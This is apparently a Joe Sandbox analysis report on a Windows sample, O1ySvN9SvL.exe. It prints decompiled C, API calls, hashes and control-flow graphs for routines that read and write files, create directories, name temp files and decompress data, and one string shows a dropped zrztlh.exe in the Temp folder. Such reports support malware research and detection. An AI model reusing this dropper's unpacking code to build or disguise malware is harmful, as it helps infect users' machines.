                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx
                • API String ID: 1941528284-3240300064
                • Opcode ID: b97167aada2fa4578f9a117d5a902ee8dbf52284c50a83dde4a4e1865d353282
                • Instruction ID: c1706ba1e04a40909550e17ecf840e167a7961d0d42511267d0e2aa6186e8961
                • Opcode Fuzzy Hash: b97167aada2fa4578f9a117d5a902ee8dbf52284c50a83dde4a4e1865d353282
                • Instruction Fuzzy Hash: 1941D331A10104BACB11BFA5DC85EBF3678EB85368B20423FF521F10E2CA7C49419B6D
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 521 402f71-402f80 522 402f82-402f98 SetFilePointer 521->522 523 402f9e-402fa9 call 40309c 521->523 522->523 526 403095-403099 523->526 527 402faf-402fc9 ReadFile 523->527 528 403092 527->528 529 402fcf-402fd2 527->529 531 403094 528->531 529->528 530 402fd8-402feb call 40309c 529->530 530->526 534 402ff1-402ff4 530->534 531->526 535 403061-403067 534->535 536 402ff6-402ff9 534->536 537 403069 535->537 538 40306c-40307f ReadFile 535->538 539 40308d-403090 536->539 540 402fff 536->540 537->538 538->528 541 403081-40308a 538->541 539->526 542 403004-40300c 540->542 541->539 543 403011-403023 ReadFile 542->543 544 40300e 542->544 543->528 545 403025-403028 543->545 544->543 545->528 546 40302a-40303f WriteFile 545->546 547 403041-403044 546->547 548 40305d-40305f 546->548 547->548 549 403046-403059 547->549 548->531 549->542 550 40305b 549->550 550->539
                C-Code - Quality: 93%
                			E00402F71(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
                				long _v8;
                				intOrPtr _v12;
                				void _t31;
                				intOrPtr _t32;
                				int _t35;
                				long _t36;
                				int _t37;
                				long _t38;
                				int _t40;
                				int _t42;
                				long _t43;
                				long _t44;
                				intOrPtr _t51;
                				long _t55;
                				long _t57;
                
                				_t31 = _a4;
                				if(_t31 >= 0) {
                					_t51 =  *0x423f78; // 0x21f4
                					_t44 = _t31 + _t51;
                					 *0x4170d4 = _t44;
                					SetFilePointer( *0x409024, _t44, 0, 0); // executed
                				}
                				_t57 = 4;
                				_t32 = E0040309C(_t57);
                				if(_t32 >= 0) {
                					_t35 = ReadFile( *0x409024,  &_a4, _t57,  &_v8, 0); // executed
                					if(_t35 == 0 || _v8 != _t57) {
                						L23:
                						_push(0xfffffffd);
                						goto L24;
                					} else {
                						 *0x4170d4 =  *0x4170d4 + _t57;
                						_t32 = E0040309C(_a4);
                						_v12 = _t32;
                						if(_t32 >= 0) {
                							if(_a12 != 0) {
                								_t36 = _a4;
                								if(_t36 >= _a16) {
                									_t36 = _a16;
                								}
                								_t37 = ReadFile( *0x409024, _a12, _t36,  &_v8, 0); // executed
                								if(_t37 == 0) {
                									goto L23;
                								} else {
                									_t38 = _v8;
                									 *0x4170d4 =  *0x4170d4 + _t38;
                									_v12 = _t38;
                									goto L22;
                								}
                							} else {
                								if(_a4 <= 0) {
                									L22:
                									_t32 = _v12;
                								} else {
                									while(1) {
                										_t55 = 0x4000;
                										if(_a4 < 0x4000) {
                											_t55 = _a4;
                										}
                										_t40 = ReadFile( *0x409024, 0x413090, _t55,  &_v8, 0); // executed
                										if(_t40 == 0 || _t55 != _v8) {
                											goto L23;
                										}
                										_t42 = WriteFile(_a8, 0x413090, _v8,  &_a16, 0); // executed
                										if(_t42 == 0 || _a16 != _t55) {
                											_push(0xfffffffe);
                											L24:
                											_pop(_t32);
                										} else {
                											_t43 = _v8;
                											_v12 = _v12 + _t43;
                											_a4 = _a4 - _t43;
                											 *0x4170d4 =  *0x4170d4 + _t43;
                											if(_a4 > 0) {
                												continue;
                											} else {
                												goto L22;
                											}
                										}
                										goto L25;
                									}
                									goto L23;
                								}
                							}
                						}
                					}
                				}
                				L25:
                				return _t32;
                			}



















                APIs
                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF,00000000,00000000,?,00007DE4), ref: 00402F98
                • ReadFile.KERNELBASE(?,00000004,00007DE4,00000000,00000004,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF,00000000,00000000,?), ref: 00402FC5
                • ReadFile.KERNELBASE(tCPInfo,00004000,00007DE4,00000000,?,?,00402F1D,000000FF,00000000,00000000,?,00007DE4), ref: 0040301F
                • WriteFile.KERNELBASE(00000000,tCPInfo,00007DE4,000000FF,00000000,?,00402F1D,000000FF,00000000,00000000,?,00007DE4), ref: 00403037
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: File$Read$PointerWrite
                • String ID: tCPInfo
                • API String ID: 2113905535-2120998202
                • Opcode ID: 85f9b32b3f954e73cf89dba4bc253831fee770f0b6474c0430461d584885da6e
                • Instruction ID: 921f3f76ada69b898c24bbee4c45453848788fed2ed6be28b521a649f4e8a62f
                • Opcode Fuzzy Hash: 85f9b32b3f954e73cf89dba4bc253831fee770f0b6474c0430461d584885da6e
                • Instruction Fuzzy Hash: 31313A31901209FBDF21CF65DD44AAE7FBCEB45365F20843BFA04A6194D2349E40DB69
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 551 4015bb-4015ce call 402a85 call 40567b 556 4015d0-4015eb call 405612 CreateDirectoryA 551->556 557 401612-401615 551->557 566 401608-401610 556->566 567 4015ed-4015f8 GetLastError 556->567 558 401635-4021bf call 401423 557->558 559 401617-401630 call 401423 call 405af4 SetCurrentDirectoryA 557->559 572 40291a-402929 558->572 559->572 566->556 566->557 568 401605 567->568 569 4015fa-401603 GetFileAttributesA 567->569 568->566 569->566 569->568
                C-Code - Quality: 85%
                			E004015BB(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
                				struct _SECURITY_ATTRIBUTES** _t10;
                				int _t19;
                				struct _SECURITY_ATTRIBUTES* _t20;
                				signed char _t22;
                				struct _SECURITY_ATTRIBUTES* _t23;
                				CHAR* _t25;
                				struct _SECURITY_ATTRIBUTES** _t29;
                				void* _t30;
                
                				_t23 = __ebx;
                				_t25 = E00402A85(0xfffffff0);
                				_t10 = E0040567B(_t25);
                				_t27 = _t10;
                				if(_t10 != __ebx) {
                					do {
                						_t29 = E00405612(_t27, 0x5c);
                						 *_t29 = _t23;
                						 *((char*)(_t30 + 0xb)) =  *_t29;
                						_t19 = CreateDirectoryA(_t25, _t23); // executed
                						if(_t19 == 0) {
                							if(GetLastError() != 0xb7) {
                								L4:
                								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                							} else {
                								_t22 = GetFileAttributesA(_t25); // executed
                								if((_t22 & 0x00000010) == 0) {
                									goto L4;
                								}
                							}
                						}
                						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                						 *_t29 = _t20;
                						_t27 =  &(_t29[0]);
                					} while (_t20 != _t23);
                				}
                				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                					_push(0xfffffff5);
                					E00401423();
                				} else {
                					E00401423(0xffffffe6);
                					E00405AF4("C:\\Users\\alfons\\AppData\\Local\\Temp", _t25);
                					SetCurrentDirectoryA(_t25); // executed
                				}
                				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t30 - 4));
                				return 0;
                			}












                APIs
                  • Part of subcall function 0040567B: CharNextA.USER32(:T@,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\,?,004056DF,C:\,C:\,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,76DDF560,0040543A,?,76DDF560,00000000), ref: 00405689
                  • Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040568E
                  • Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040569D
                • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015FB
                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040162A
                Strings
                • C:\Users\user\AppData\Local\Temp, xrefs: 0040161F
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 3751793516-1943935188
                • Opcode ID: ac794f138ba7f61467d4ebe51835dd724794318f642f069794646da26921047b
                • Instruction ID: 63bcb5d4f1e8c965e9b2f85ce20a33f9a17abe043d5819b309257051beb803d0
                • Opcode Fuzzy Hash: ac794f138ba7f61467d4ebe51835dd724794318f642f069794646da26921047b
                • Instruction Fuzzy Hash: B9012B31908050ABDB216F755D4497F3774DA55325B28063FF4D2B32E2D63C0D42962E
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 576 4057fa-405804 577 405805-40582f GetTickCount GetTempFileNameA 576->577 578 405831-405833 577->578 579 40583e-405840 577->579 578->577 580 405835 578->580 581 405838-40583b 579->581 580->581
                C-Code - Quality: 100%
                			E004057FA(char _a4, intOrPtr _a6, CHAR* _a8) {
                				signed int _t11;
                				int _t14;
                				signed int _t16;
                				void* _t19;
                				CHAR* _t20;
                
                				_t20 = _a4;
                				_t19 = 0x64;
                				while(1) {
                					_t19 = _t19 - 1;
                					_a4 = 0x61736e;
                					_t11 = GetTickCount();
                					_t16 = 0x1a;
                					_a6 = _a6 + _t11 % _t16;
                					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                					if(_t14 != 0) {
                						break;
                					}
                					if(_t19 != 0) {
                						continue;
                					}
                					 *_t20 =  *_t20 & 0x00000000;
                					return _t14;
                				}
                				return _t20;
                			}









                APIs
                • GetTickCount.KERNEL32 ref: 0040580D
                • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405827
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CountFileNameTempTick
                • String ID: "C:\Users\user\Desktop\O1ySvN9SvL.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                • API String ID: 1716503409-1721151800
                • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                • Instruction ID: 2f33edf353eb26188edb3eebd43b66705c4d1fe0bdf9ced7dfec13a37dcb2b50
                • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                • Instruction Fuzzy Hash: 5BF0A037748248BAE7105E55EC04B9B7F9DDF91760F14C02BFE089A1C0D6B09968CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 586 405ed4-405ef7 587 405f01-405f04 586->587 588 405ef9-405efc 586->588 590 405f07-405f10 587->590 589 406921-406925 588->589 591 405f16 590->591 592 40691e 590->592 593 405fc2-405fc6 591->593 594 406032-406036 591->594 595 405f1d-405f21 591->595 596 40605d-406704 591->596 592->589 597 406872-40687c 593->597 598 405fcc-405fe5 593->598 601 406881-40688b 594->601 602 40603c-406050 594->602 599 405f27-405f34 595->599 600 406909-40691c 595->600 605 406706-40671c 596->605 606 40671e-406734 596->606 597->600 604 405fe8-405fec 598->604 599->592 607 405f3a-405f80 599->607 600->589 601->600 608 406053-40605b 602->608 604->593 609 405fee-405ff4 604->609 610 406737-40673e 605->610 606->610 611 405f82-405f86 607->611 612 405fa8-405faa 607->612 608->594 608->596 615 405ff6-405ffd 609->615 616 40601e-406030 609->616 617 406740-406744 610->617 618 406765-406771 610->618 619 405f91-405f9f GlobalAlloc 611->619 620 405f88-405f8b GlobalFree 611->620 613 405fb8-405fc0 612->613 614 405fac-405fb6 612->614 613->604 614->613 614->614 621 406008-406018 GlobalAlloc 615->621 622 405fff-406002 GlobalFree 615->622 616->608 623 4068f3-4068fd 617->623 624 40674a-406762 617->624 618->590 619->592 626 405fa5 619->626 620->619 621->592 621->616 622->621 623->600 624->618 626->612
                C-Code - Quality: 98%
                			E00405ED4(void* __ecx) {
                				void* _v8;
                				void* _v12;
                				signed int _v16;
                				unsigned int _v20;
                				signed int _v24;
                				signed int _v28;
                				signed int _v32;
                				signed int _v36;
                				signed int _v40;
                				signed int _v44;
                				signed int _v48;
                				signed int _v52;
                				signed int _v56;
                				signed int _v60;
                				signed int _v64;
                				signed int _v68;
                				signed int _v72;
                				signed int _v76;
                				signed int _v80;
                				signed int _v84;
                				signed int _v88;
                				signed int _v92;
                				signed int _v95;
                				signed int _v96;
                				signed int _v100;
                				signed int _v104;
                				signed int _v108;
                				signed int _v112;
                				signed int _v116;
                				signed int _v120;
                				intOrPtr _v124;
                				signed int _v128;
                				signed int _v132;
                				signed int _v136;
                				void _v140;
                				void* _v148;
                				signed int _t537;
                				signed int _t538;
                				signed int _t572;
                
                				_t572 = 0x22;
                				_v148 = __ecx;
                				memcpy( &_v140, __ecx, _t572 << 2);
                				if(_v52 == 0xffffffff) {
                					return 1;
                				}
                				while(1) {
                					L3:
                					_t537 = _v140;
                					if(_t537 > 0x1c) {
                						break;
                					}
                					switch( *((intOrPtr*)(_t537 * 4 +  &M00406926))) {
                						case 0:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								goto L173;
                							}
                							_v112 = _v112 - 1;
                							_v116 = _v116 + 1;
                							_t537 =  *_v116;
                							__eflags = _t537 - 0xe1;
                							if(_t537 > 0xe1) {
                								goto L174;
                							}
                							_t542 = _t537 & 0x000000ff;
                							_push(0x2d);
                							asm("cdq");
                							_pop(_t576);
                							_push(9);
                							_pop(_t577);
                							_t622 = _t542 / _t576;
                							_t544 = _t542 % _t576 & 0x000000ff;
                							asm("cdq");
                							_t617 = _t544 % _t577 & 0x000000ff;
                							_v64 = _t617;
                							_v32 = (1 << _t622) - 1;
                							_v28 = (1 << _t544 / _t577) - 1;
                							_t625 = (0x300 << _t617 + _t622) + 0x736;
                							__eflags = 0x600 - _v124;
                							if(0x600 == _v124) {
                								L12:
                								__eflags = _t625;
                								if(_t625 == 0) {
                									L14:
                									_v76 = _v76 & 0x00000000;
                									_v68 = _v68 & 0x00000000;
                									goto L17;
                								} else {
                									goto L13;
                								}
                								do {
                									L13:
                									_t625 = _t625 - 1;
                									__eflags = _t625;
                									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                								} while (_t625 != 0);
                								goto L14;
                							}
                							__eflags = _v8;
                							if(_v8 != 0) {
                								GlobalFree(_v8);
                							}
                							_t537 = GlobalAlloc(0x40, 0x600); // executed
                							__eflags = _t537;
                							_v8 = _t537;
                							if(_t537 == 0) {
                								goto L174;
                							} else {
                								_v124 = 0x600;
                								goto L12;
                							}
                						case 1:
                							L15:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								_v140 = 1;
                								goto L173;
                							}
                							_v112 = _v112 - 1;
                							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                							_v116 = _v116 + 1;
                							_t50 =  &_v76;
                							 *_t50 = _v76 + 1;
                							__eflags =  *_t50;
                							L17:
                							__eflags = _v76 - 4;
                							if(_v76 < 4) {
                								goto L15;
                							}
                							_t550 = _v68;
                							__eflags = _t550 - _v120;
                							if(_t550 == _v120) {
                								L22:
                								_v76 = 5;
                								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                								goto L25;
                							}
                							__eflags = _v12;
                							_v120 = _t550;
                							if(_v12 != 0) {
                								GlobalFree(_v12);
                							}
                							_t537 = GlobalAlloc(0x40, _v68); // executed
                							__eflags = _t537;
                							_v12 = _t537;
                							if(_t537 == 0) {
                								goto L174;
                							} else {
                								goto L22;
                							}
                						case 2:
                							L26:
                							_t557 = _v100 & _v32;
                							_v136 = 6;
                							_v80 = _t557;
                							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                							goto L135;
                						case 3:
                							L23:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								_v140 = 3;
                								goto L173;
                							}
                							_v112 = _v112 - 1;
                							_t72 =  &_v116;
                							 *_t72 = _v116 + 1;
                							__eflags =  *_t72;
                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							L25:
                							_v76 = _v76 - 1;
                							__eflags = _v76;
                							if(_v76 != 0) {
                								goto L23;
                							}
                							goto L26;
                						case 4:
                							L136:
                							_t559 =  *_t626;
                							_t610 = _t559 & 0x0000ffff;
                							_t591 = (_v20 >> 0xb) * _t610;
                							__eflags = _v16 - _t591;
                							if(_v16 >= _t591) {
                								_v20 = _v20 - _t591;
                								_v16 = _v16 - _t591;
                								_v68 = 1;
                								_t560 = _t559 - (_t559 >> 5);
                								__eflags = _t560;
                								 *_t626 = _t560;
                							} else {
                								_v20 = _t591;
                								_v68 = _v68 & 0x00000000;
                								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                							}
                							__eflags = _v20 - 0x1000000;
                							if(_v20 >= 0x1000000) {
                								goto L142;
                							} else {
                								goto L140;
                							}
                						case 5:
                							L140:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								_v140 = 5;
                								goto L173;
                							}
                							_v20 = _v20 << 8;
                							_v112 = _v112 - 1;
                							_t464 =  &_v116;
                							 *_t464 = _v116 + 1;
                							__eflags =  *_t464;
                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							L142:
                							_t561 = _v136;
                							goto L143;
                						case 6:
                							__edx = 0;
                							__eflags = _v68;
                							if(_v68 != 0) {
                								__eax = _v8;
                								__ecx = _v60;
                								_v56 = 1;
                								_v136 = 7;
                								__esi = _v8 + 0x180 + _v60 * 2;
                								goto L135;
                							}
                							__eax = _v96 & 0x000000ff;
                							__esi = _v100;
                							__cl = 8;
                							__cl = 8 - _v64;
                							__esi = _v100 & _v28;
                							__eax = (_v96 & 0x000000ff) >> 8;
                							__ecx = _v64;
                							__esi = (_v100 & _v28) << 8;
                							__ecx = _v8;
                							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                							__eflags = _v60 - 4;
                							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                							if(_v60 >= 4) {
                								__eflags = _v60 - 0xa;
                								if(_v60 >= 0xa) {
                									_t103 =  &_v60;
                									 *_t103 = _v60 - 6;
                									__eflags =  *_t103;
                								} else {
                									_v60 = _v60 - 3;
                								}
                							} else {
                								_v60 = 0;
                							}
                							__eflags = _v56 - __edx;
                							if(_v56 == __edx) {
                								__ebx = 0;
                								__ebx = 1;
                								goto L63;
                							}
                							__eax = _v24;
                							__eax = _v24 - _v48;
                							__eflags = __eax - _v120;
                							if(__eax >= _v120) {
                								__eax = __eax + _v120;
                								__eflags = __eax;
                							}
                							__ecx = _v12;
                							__ebx = 0;
                							__ebx = 1;
                							__al =  *((intOrPtr*)(__eax + __ecx));
                							_v95 =  *((intOrPtr*)(__eax + __ecx));
                							goto L43;
                						case 7:
                							__eflags = _v68 - 1;
                							if(_v68 != 1) {
                								__eax = _v40;
                								_v132 = 0x16;
                								_v36 = _v40;
                								__eax = _v44;
                								_v40 = _v44;
                								__eax = _v48;
                								_v44 = _v48;
                								__eax = 0;
                								__eflags = _v60 - 7;
                								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                								__al = __al & 0x000000fd;
                								__eax = (__eflags >= 0) - 1 + 0xa;
                								_v60 = (__eflags >= 0) - 1 + 0xa;
                								__eax = _v8;
                								__eax = _v8 + 0x664;
                								__eflags = __eax;
                								_v92 = __eax;
                								goto L71;
                							}
                							__eax = _v8;
                							__ecx = _v60;
                							_v136 = 8;
                							__esi = _v8 + 0x198 + _v60 * 2;
                							goto L135;
                						case 8:
                							__eflags = _v68;
                							if(_v68 != 0) {
                								__eax = _v8;
                								__ecx = _v60;
                								_v136 = 0xa;
                								__esi = _v8 + 0x1b0 + _v60 * 2;
                							} else {
                								__eax = _v60;
                								__ecx = _v8;
                								__eax = _v60 + 0xf;
                								_v136 = 9;
                								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                							}
                							goto L135;
                						case 9:
                							__eflags = _v68;
                							if(_v68 != 0) {
                								goto L92;
                							}
                							__eflags = _v100;
                							if(_v100 == 0) {
                								goto L174;
                							}
                							__eax = 0;
                							__eflags = _v60 - 7;
                							_t264 = _v60 - 7 >= 0;
                							__eflags = _t264;
                							0 | _t264 = _t264 + _t264 + 9;
                							_v60 = _t264 + _t264 + 9;
                							goto L78;
                						case 0xa:
                							__eflags = _v68;
                							if(_v68 != 0) {
                								__eax = _v8;
                								__ecx = _v60;
                								_v136 = 0xb;
                								__esi = _v8 + 0x1c8 + _v60 * 2;
                								goto L135;
                							}
                							__eax = _v44;
                							goto L91;
                						case 0xb:
                							__eflags = _v68;
                							if(_v68 != 0) {
                								__ecx = _v40;
                								__eax = _v36;
                								_v36 = _v40;
                							} else {
                								__eax = _v40;
                							}
                							__ecx = _v44;
                							_v40 = _v44;
                							L91:
                							__ecx = _v48;
                							_v48 = __eax;
                							_v44 = _v48;
                							L92:
                							__eax = _v8;
                							_v132 = 0x15;
                							__eax = _v8 + 0xa68;
                							_v92 = _v8 + 0xa68;
                							goto L71;
                						case 0xc:
                							L102:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								_v140 = 0xc;
                								goto L173;
                							}
                							__ecx = _v116;
                							__eax = _v16;
                							_v20 = _v20 << 8;
                							__ecx =  *_v116 & 0x000000ff;
                							_v112 = _v112 - 1;
                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							_t340 =  &_v116;
                							 *_t340 = _v116 + 1;
                							__eflags =  *_t340;
                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							__eax = _v48;
                							goto L104;
                						case 0xd:
                							L39:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								_v140 = 0xd;
                								goto L173;
                							}
                							__ecx = _v116;
                							__eax = _v16;
                							_v20 = _v20 << 8;
                							__ecx =  *_v116 & 0x000000ff;
                							_v112 = _v112 - 1;
                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							_t127 =  &_v116;
                							 *_t127 = _v116 + 1;
                							__eflags =  *_t127;
                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							L41:
                							__eax = _v68;
                							__eflags = _v76 - _v68;
                							if(_v76 != _v68) {
                								goto L50;
                							}
                							__eflags = __ebx - 0x100;
                							if(__ebx >= 0x100) {
                								goto L56;
                							}
                							L43:
                							__eax = _v95 & 0x000000ff;
                							_v95 = _v95 << 1;
                							__ecx = _v92;
                							__eax = (_v95 & 0x000000ff) >> 7;
                							_v76 = __eax;
                							__eax = __eax + 1;
                							__eax = __eax << 8;
                							__eax = __eax + __ebx;
                							__esi = _v92 + __eax * 2;
                							_v20 = _v20 >> 0xb;
                							__ax =  *__esi;
                							_v88 = __esi;
                							__edx = __ax & 0x0000ffff;
                							__ecx = (_v20 >> 0xb) * __edx;
                							__eflags = _v16 - __ecx;
                							if(_v16 >= __ecx) {
                								_v20 = _v20 - __ecx;
                								_v16 = _v16 - __ecx;
                								__cx = __ax;
                								_v68 = 1;
                								__cx = __ax >> 5;
                								__eflags = __eax;
                								__ebx = __ebx + __ebx + 1;
                								 *__esi = __ax;
                							} else {
                								_v68 = _v68 & 0x00000000;
                								_v20 = __ecx;
                								0x800 = 0x800 - __edx;
                								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                								__ebx = __ebx + __ebx;
                								 *__esi = __cx;
                							}
                							__eflags = _v20 - 0x1000000;
                							_v72 = __ebx;
                							if(_v20 >= 0x1000000) {
                								goto L41;
                							} else {
                								goto L39;
                							}
                						case 0xe:
                							L48:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								_v140 = 0xe;
                								goto L173;
                							}
                							__ecx = _v116;
                							__eax = _v16;
                							_v20 = _v20 << 8;
                							__ecx =  *_v116 & 0x000000ff;
                							_v112 = _v112 - 1;
                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							_t161 =  &_v116;
                							 *_t161 = _v116 + 1;
                							__eflags =  *_t161;
                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							while(1) {
                								L50:
                								__eflags = __ebx - 0x100;
                								if(__ebx >= 0x100) {
                									break;
                								}
                								__eax = _v92;
                								__edx = __ebx + __ebx;
                								__ecx = _v20;
                								__esi = __edx + __eax;
                								__ecx = _v20 >> 0xb;
                								__ax =  *__esi;
                								_v88 = __esi;
                								__edi = __ax & 0x0000ffff;
                								__ecx = (_v20 >> 0xb) * __edi;
                								__eflags = _v16 - __ecx;
                								if(_v16 >= __ecx) {
                									_v20 = _v20 - __ecx;
                									_v16 = _v16 - __ecx;
                									__cx = __ax;
                									_t175 = __edx + 1; // 0x1
                									__ebx = _t175;
                									__cx = __ax >> 5;
                									__eflags = __eax;
                									 *__esi = __ax;
                								} else {
                									_v20 = __ecx;
                									0x800 = 0x800 - __edi;
                									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                									__ebx = __ebx + __ebx;
                									 *__esi = __cx;
                								}
                								__eflags = _v20 - 0x1000000;
                								_v72 = __ebx;
                								if(_v20 >= 0x1000000) {
                									continue;
                								} else {
                									goto L48;
                								}
                							}
                							L56:
                							_t178 =  &_v56;
                							 *_t178 = _v56 & 0x00000000;
                							__eflags =  *_t178;
                							goto L57;
                						case 0xf:
                							L60:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								_v140 = 0xf;
                								goto L173;
                							}
                							__ecx = _v116;
                							__eax = _v16;
                							_v20 = _v20 << 8;
                							__ecx =  *_v116 & 0x000000ff;
                							_v112 = _v112 - 1;
                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							_t208 =  &_v116;
                							 *_t208 = _v116 + 1;
                							__eflags =  *_t208;
                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							L62:
                							__eflags = __ebx - 0x100;
                							if(__ebx >= 0x100) {
                								L57:
                								__al = _v72;
